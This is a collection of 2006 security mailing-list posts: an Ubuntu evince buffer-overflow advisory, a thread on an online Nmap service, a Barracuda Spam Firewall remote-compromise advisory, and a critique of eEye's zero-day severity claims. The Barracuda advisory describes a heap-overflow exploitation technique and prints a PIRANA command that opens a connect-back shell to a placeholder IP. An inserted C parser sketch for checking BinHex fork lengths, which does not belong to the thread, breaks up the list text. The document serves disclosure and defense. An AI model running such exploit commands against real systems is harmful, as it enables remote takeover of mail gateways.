CVE-2006-5864
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  evince   0.4.0-0ubuntu4.3

Ubuntu 6.06 LTS:
  evince   0.5.2-0ubuntu3.2

Ubuntu 6.10:
  evince   0.6.1-0ubuntu1.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-390-1 fixed a vulnerability in evince.  The original fix did not 
fully solve the problem, allowing for a denial of service in certain 
situations.

Original advisory details:

  A buffer overflow was discovered in the PostScript processor included 
  in evince.  By tricking a user into opening a specially crafted PS 
  file, an attacker could crash evince or execute arbitrary code with 
  the user's privileges.


Updated packages for Ubuntu 5.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3.diff.gz
  Size/MD5:11703 57da8bfc0ad787ae9c8ecd69c517249c

http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3.dsc
  Size/MD5: 1873 72d17a9bdb8a65e1a240834099cfdbe6

http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0.orig.tar.gz
  Size/MD5:  1172276 9c1009e3dae55bcda1bc5204f021ad1b

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3_amd64.deb
  Size/MD5:   652508 2815d3389a1260c6388485b71c3bb5b1

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3_i386.deb
  Size/MD5:   602688 3f7768319e1d5f8f3a3131cf23856c86

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3_powerpc.deb
  Size/MD5:   637256 0c2653001eb6c40e0a3228f8dd49598f

  sparc architecture (Sun SPARC/UltraSPARC)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.4.0-0ubuntu4.3_sparc.deb
  Size/MD5:   616900 ade92071c11fd148af61ec3f57900ea3

Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2.diff.gz
  Size/MD5:11818 e485f45171c5558cb7d7fec930f050ba

http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2.dsc
  Size/MD5: 1977 15a5db1f73061fbf0d468e9c4a8fe0c7

http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2.orig.tar.gz
  Size/MD5:  1362513 5020afb1768d89c251ad8c2a233d9fcf

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2_amd64.deb
  Size/MD5:   747902 8f75cb0125481699918dfd23c3d81718

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2_i386.deb
  Size/MD5:   692882 392d072d36c0c200f14ff44c5dd40858

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2_powerpc.deb
  Size/MD5:   729070 d5053fd093002988670243a050f8be1f

  sparc architecture (Sun SPARC/UltraSPARC)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.5.2-0ubuntu3.2_sparc.deb
  Size/MD5:   704756 19aa53d800f922641d8660417a982fc4

Updated packages for Ubuntu 6.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2.diff.gz
  Size/MD5: 7742 31f26b98ab68c5c9f7bb9a133ddec8f3

http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2.dsc
  Size/MD5: 1679 6e3252457e5c8703932a04804c2af514

http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1.orig.tar.gz
  Size/MD5:  1687870 665387e278d4da97f7540aeddeaae57d

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2_amd64.deb
  Size/MD5:   944244 bbcc0ea3a31c4f71c528dbf4d144f0e3

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2_i386.deb
  Size/MD5:   901854 ab0b5badc19b9c7665dee69ab937dd02

  powerpc architecture (Apple Macintosh G3/G4/G5)


http://security.ubuntu.com/ubuntu/pool/main/e/evince/evince_0.6.1-0ubuntu1.2_powerpc.deb
  Size/MD5:   926276 fda07c35d1f38589f515720772888785

  sparc architecture (Sun SPARC/UltraSPARC)



Re: [Full-disclosure] Nmap Online

2006-12-05 Thread Greg


 -Original Message-
 From: Ed Carp [mailto:[EMAIL PROTECTED] 
 Sent: Wednesday, 6 December 2006 2:06 PM
 To: full-disclosure@lists.grok.org.uk
 Cc: David Matousek
 Subject: Re: [Full-disclosure] Nmap Online
 
 
 
 On 12/5/06, Simon Smith [EMAIL PROTECTED] wrote:
 
  Why would you do this?
 
 Well, for one, sometimes you need to do a port scan when 
 you're not in front of a system that has nmap installed on 
 it.  I get a call about once every couple of months, why 
 can't I get into my email server that's sitting behind a 
 hardware router with a hole poked in it for port 110.  Doing 
 a port scan on the client's IP address ensures that either 
 yes, the port is open or no, it's not.  If it's open then I 
 can proceed with my troubleshooting - if not, I know where to 
 look for the problem.
 

I don't wish to upset anyone but that answer has to be the craziest FIRST
port of call approach I have seen used. I get plenty of those sorts of
calls. I take about 30 seconds time on the phone for almost all of them. I
say "Pull the power plug out of the router. Wait 10 seconds, plug it back in
and wait another 10 seconds. OK, try now" and almost all of them report it
works well.

So why would I need and how could I use Nmap online to tell me the router
went crazy and locked up?

Besides, wouldn't it be just as easy to use the Nmap sitting on my computer
if I decided I needed to use it?

Greg.



[Full-disclosure] Barracuda Convert-UUlib library buffer overflow leads to remote compromise

2006-12-05 Thread Jean-Sébastien Guay-Leroux
Topic:  Barracuda Convert-UUlib library buffer
overflow leads to remote compromise

Announced:  2006-12-05
Product:Barracuda Spam Firewall
Vendor: http://www.barracudanetworks.com/
Impact: Remote shell access
Affected product:   Barracuda Spam Firewall with firmware < 3.3.15.026
AND virus definition < 2.0.325
Credits:Jean-Sébastien Guay-Leroux
CVE ID: CVE-2005-1349


I.  BACKGROUND

The Barracuda Spam Firewall is an integrated hardware and software
solution for complete protection of your email server. It provides a
powerful, easy to use, and affordable solution to eliminating spam and
virus from your organization by providing the following protection:

 * Anti-spam
 * Anti-virus
 * Anti-spoofing
 * Anti-phishing
 * Anti-spyware (Attachments)
 * Denial of Service


II. DESCRIPTION

In 2005, Mark Martinec and Robert Lewis found a flaw in the Convert-
UUlib library.  Few details were published regarding this flaw.

After some research, I found that the flaw was in the part of the code
where BinHex files were getting parsed.  By supplying an invalid size
for the resource fork or data fork in a BinHex's file header, it is
possible to create a heap overflow.

By taking advantage of the sequentials calls to free(), it's possible
to overwrite more than 4 bytes.  In fact, we can write a jmpcode in
memory that will jump to one of our registers containing the location
of our shellcode.  By using this technique, the exploit will be much
more reliable.  You will only need to supply a return location address
to the exploit code.

You do NOT need to have remote administration access (on port 8000)
for successfull exploitation.

For further information about the details of the bugs, check the
exploit code.


III.IMPACT

Gain shell access to the remote Barracuda Spam Firewall.


IV. PROOF OF CONCEPT

Using the PIRANA framework, available at http://www.guay-leroux.com,
it is possible to test the Barracuda Spam Firewall against the
Convert-UUlib vulnerability.

The version 0.3.1 of the PIRANA framework incorporates a new module to
exploit the Convert-UUlib library bug.  It contains three hardcoded
offsets that should reliably exploit every Barracuda Spam Firewall
with a firmware below 3.3.15.026 and virus definition below 2.0.325.

By calling PIRANA the way it is described below, you will get a TCP
connect back shell on IP address 1.2.3.4 and port 1234:

perl pirana.pl -e 5 -h barracuda.vulnerable.com -a postmaster -s 0 \
-l 1.2.3.4 -p 1234


V.  VERSIONS AFFECTED

This affects firmware releases before version 3.3.15.026.  This is no
longer an issue with Barracuda's customers with current Energize
Updates, running virus definition 2.0.325, released Nov. 29, 2006.  It
is recommended that Barracuda's customers upgrade to the latest
generally available release.


VI. CREDITS

Mark Martinec and Robert Lewis found the original flaw in Convert-UUlib.

Jean-Sébastien Guay-Leroux conducted further research on the bug and
produced an exploitation plugin for the PIRANA framework.


VII.REFERENCES

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1349


VIII.   HISTORY

2005-04-26  : Bug is disclosed by Mark Martinec and Robert Lewis.
2006-08-??  : Convert-UUlib module exploit written for PIRANA.
2006-11-28  : Barracuda Networks is notified about the problem.
2006-11-28  : Barracuda Networks acknowledged the problem.
2006-11-29  : Barracuda Networks published a fix.
2006-12-05  : Advisory is disclosed to the public.

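As an added, defender-side illustration of the bug class the advisory above describes (trusting the fork sizes declared in a BinHex header), and not code from the advisory, from PIRANA or from Convert-UUlib: a parser for the decoded BinHex 4.0 header that checks the declared data-fork and resource-fork lengths against the bytes actually present before anything is allocated or copied. The field layout is the published BinHex 4.0 format; the sample buffers are constructed here.

```c
#include <stdint.h>
#include <string.h>
/* Decoded BinHex 4.0 header: name length(1), name, version(1), type(4),
 * creator(4), flags(2), data-fork len(4), resource-fork len(4), CRC(2). */
typedef struct { char name[64]; uint32_t data_len, rsrc_len; } binhex_hdr;

static uint32_t be32(const uint8_t *p) {
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3];
}
static void put32(uint8_t *p, uint32_t v) {
    p[0] = v >> 24; p[1] = v >> 16; p[2] = v >> 8; p[3] = (uint8_t)v;
}

/* Returns 0 if the header is well-formed and both forks (plus their 2-byte CRCs)
 * fit inside the decoded input, a negative code otherwise. The declared lengths
 * may be used for allocation or copying only after this check succeeds. */
int binhex_parse_header(const uint8_t *buf, size_t len, binhex_hdr *out) {
    if (len < 1) return -1;
    size_t n = buf[0];
    if (n == 0 || n > 63) return -2;              /* implausible name length */
    size_t hdr_len = 1 + n + 21;                  /* 21 = fixed fields incl. CRC */
    if (len < hdr_len) return -3;                 /* truncated header */
    const uint8_t *f = buf + 1 + n;               /* f[0] is the version byte */
    uint64_t dlen = be32(f + 11), rlen = be32(f + 15), avail = len - hdr_len;
    if (dlen + 2 > avail) return -4;              /* data fork overruns input */
    if (dlen + 2 + rlen + 2 > avail) return -5;   /* resource fork overruns input */
    memcpy(out->name, buf + 1, n); out->name[n] = '\0';
    out->data_len = (uint32_t)dlen; out->rsrc_len = (uint32_t)rlen;
    return 0;
}

/* Constructed 34-byte sample: name "a.txt", 3-byte data fork "abc", empty
 * resource fork, with caller-chosen *declared* lengths to exercise the check. */
size_t make_sample(uint8_t *buf, uint32_t claimed_dlen, uint32_t claimed_rlen) {
    size_t i = 0;
    buf[i++] = 5; memcpy(buf + i, "a.txt", 5); i += 5;
    buf[i++] = 0; memcpy(buf + i, "TEXTttxt", 8); i += 8;   /* version, type, creator */
    buf[i++] = 0; buf[i++] = 0;                              /* finder flags */
    put32(buf + i, claimed_dlen); i += 4;
    put32(buf + i, claimed_rlen); i += 4;
    buf[i++] = 0; buf[i++] = 0;                              /* header CRC (not checked here) */
    memcpy(buf + i, "abc", 3); i += 3;                       /* real data fork */
    memset(buf + i, 0, 4); i += 4;                           /* data- and resource-fork CRCs */
    return i;
}
/* Builds a sample with the given declared lengths and returns the parser's verdict. */
int check_sample(uint32_t claimed_dlen, uint32_t claimed_rlen) {
    uint8_t buf[64]; binhex_hdr h;
    return binhex_parse_header(buf, make_sample(buf, claimed_dlen, claimed_rlen), &h);
}
```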


Re: [Full-disclosure] Nmap Online

2006-12-05 Thread Richard A Nelson
On Wed, 6 Dec 2006, Greg wrote:

> I don't wish to upset anyone but that answer has to be the craziest FIRST
> port of call approach I have seen used. I get plenty of those sorts of
> calls. I take about 30 seconds time on the phone for almost all of them. I
> say Pull the power plug out of the router. Wait 10 seconds, plug it back in
> and wait another 10 seconds. OK, try now and almost all of them report it
> works well.

That is heavily target market specific...  Whilst I offer the same line to some
friends and family, others I wouldn't dare start there (out of respect -
they've already done everything obvious before asking for help).

> Besides, wouldn't it be just as easy to use the Nmap sitting on my computer
> if I decided I needed to use it?

If only it was always that easy...  I just moved, and whilst the ISP is
the same, the CLEC is new - new lines, new IP, some newer software, etc.

I need to verify *my* setup, so:
* my local nmap is useless
* my work boxen are heavily firewalled - even outbound
* my accounts elsewhere usually don't have nmap available
  to non-admins (and I shy from that role unless needed).

So...   For me, this has been a great service, and I'm sure I'm not
alone.

-- 
Rick Nelson
Life'll kill ya -- Warren Zevon
Then you'll be dead -- Life'll kill ya



Re: [Full-disclosure] Nmap Online

2006-12-05 Thread Ed Carp
On 12/5/06, Greg [EMAIL PROTECTED] wrote:

> I don't wish to upset anyone but that answer has to be the craziest FIRST
> port of call approach I have seen used. I get plenty of those sorts of

Who said it was the first thing that was tried?  And you just can't
pull the plug on a router in a production shop.



[Full-disclosure] eEye's Zero-Day Tracker Launch

2006-12-05 Thread chinese soup

http://eeyeresearch.typepad.com/blog/
http://research.eeye.com/html/alerts/zeroday/index.html

If something is reported as a non-exploitable bug, we'll make sure to
exhaust the flaw for exploitability, as we have shown with the ASX Playlist
and the ADODB.Connection ActiveX zero-day vulnerabilities.

Or.. FUD?

1.) Adobe ActiveX
http://research.eeye.com/html/alerts/zeroday/20061128.html

Although there was no supplied proof of concept for these vulnerabilities,
releasing the method names as well as the fact that they are 'memory
corruption' errors and 'could be exploited by attackers to take complete
control of an affected system' without a vendor-supplied patch will put many
Adobe users at risk.

And..

Remote Code Execution:
Yes

Now wait a second, I thought that you guys were going to make sure to
exhaust the flaw for exploitability? Did you actually try this out that you
can say Remote Code Execution is possible?


2.) ASX Playlist
http://research.eeye.com/html/alerts/zeroday/20061122.html

Now this is fun.

Severity:
High

Remote Code Execution:
Yes

As a result, a two- or four-byte heap overflow is possible if the REF
HREF URL features a protocol shorter than three characters (the length of
mms).

Ok. But wait, what's this sentence doing here:
Exploitability due to the corruption of the adjacent heap block's header
has not yet been demonstrated but is assumed likely.

So... you ASSUMED that it is likely, even though you can only have up to a
4-byte overwrite which does not overwrite the needed pointers in order to
actually exploit this, yet you say Yes in Remote Code Execution?

trippin-out,
noodles for long life!